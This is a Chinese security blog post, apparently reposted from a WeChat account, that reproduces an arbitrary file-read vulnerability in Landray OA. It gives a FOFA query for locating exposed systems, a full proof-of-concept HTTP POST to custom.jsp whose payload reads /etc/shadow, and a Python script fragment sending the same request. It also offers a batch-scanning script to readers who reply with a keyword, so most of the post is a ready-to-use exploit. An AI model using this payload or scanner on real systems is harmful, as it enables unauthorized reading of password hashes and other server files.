漏洞复现-蓝凌OA文件读取

admin 2021年7月24日09:18:50评论260 views字数 813阅读2分42秒阅读模式

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语句:

app="Landray-OA"


漏洞相关介绍:

深圳市蓝凌软件股份有限公司成立于2001年,生态OA引领者、数字化工作专业服务商、阿里云知识管理与协同领域首家战略合作伙伴,为各类组织提供智能办公、移动门户、知识管理、合同管理、数字运营、财务共享等一体化解决方案,近期Landray-OA系统被爆出存任意文件读取漏洞。


漏洞POC分析:


POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
var={"body":{"file":"file:///etc/shadow"}}


漏洞利用截图:

漏洞复现-蓝凌OA文件读取


脚本部分代码:

target = url+"/sys/ui/extend/varkind/custom.jsp"    headers = {      'Content-Type': 'application/x-www-form-urlencoded',      'Accept-Encoding': 'gzip',    }    data = 'var={"body":{"file":"file:///etc/shadow"}}'


脚本利用截图:

漏洞复现-蓝凌OA文件读取

漏洞复现-蓝凌OA文件读取

支持批量扫描,单个扫描!

获取脚本回复:蓝凌OA

本文始发于微信公众号(Fight Tigers Team):漏洞复现-蓝凌OA文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月24日09:18:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-蓝凌OA文件读取https://cn-sec.com/archives/365694.html

发表评论

匿名网友 填写信息